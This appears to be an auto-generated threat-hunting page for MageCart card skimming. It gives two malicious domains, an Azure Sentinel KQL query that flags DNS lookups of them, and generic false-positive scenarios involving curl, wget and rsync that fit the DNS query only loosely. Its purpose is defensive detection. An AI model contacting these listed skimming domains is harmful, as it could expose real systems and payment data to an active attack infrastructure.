Adversaries are likely using MageCart IOCs to inject malicious scripts into legitimate websites to steal user data. SOC teams should proactively hunt for these indicators in Azure Sentinel to detect and mitigate supply chain attacks before they cause significant data breaches.
IOC Summary
Malware Family: magecart Total IOCs: 2 IOC Types: domain
| Type | Value | Threat Type | First Seen | Confidence |
|---|---|---|---|---|
| domain | yellowtag.shop | cc_skimming | 2026-05-18 | 100% |
| domain | kopet.pics | cc_skimming | 2026-05-18 | 100% |
// Hunt for DNS queries to known malicious domains
// Source: ThreatFox - magecart
let malicious_domains = dynamic(["yellowtag.shop", "kopet.pics"]);
DnsEvents
| where Name has_any (malicious_domains)
| project TimeGenerated, Computer, Name, IPAddresses, QueryType
| order by TimeGenerated desc| Sentinel Table | Notes |
|---|---|
DnsEvents | Ensure this data connector is enabled |
Scenario: Scheduled System Backup Using rsync
Description: A legitimate scheduled backup job using rsync to transfer files to a remote server.
Filter/Exclusion: Exclude rsync commands executed during known backup windows or against internal IP ranges used for backups.
Scenario: Admin Task Using wget to Download Configuration Files
Description: An administrator uses wget to fetch updated configuration files from an internal repository.
Filter/Exclusion: Exclude wget commands targeting internal URLs or known configuration management endpoints.
Scenario: CI/CD Pipeline Artifact Download Using curl
Description: A CI/CD pipeline (e.g., Jenkins, GitLab CI) uses curl to download build artifacts from a secure internal server.
Filter/Exclusion: Exclude curl commands to internal artifact repositories or during CI/CD job execution times.
Scenario: Log Collection Using logrotate and rsync
Description: A log rotation and transfer process using logrotate and rsync to move logs to a central logging server.
Filter/Exclusion: Exclude rsync transfers to known log aggregation servers or during log rotation schedules.
Scenario: Internal Tool for Threat Intelligence Feeds Update
Description: A company-specific tool (e.g., threat-intel-updater) is used to fetch and update threat intelligence feeds from internal sources.
Filter/Exclusion: Exclude traffic to internal threat intelligence feeds or processes associated with the internal tool’s name or signature.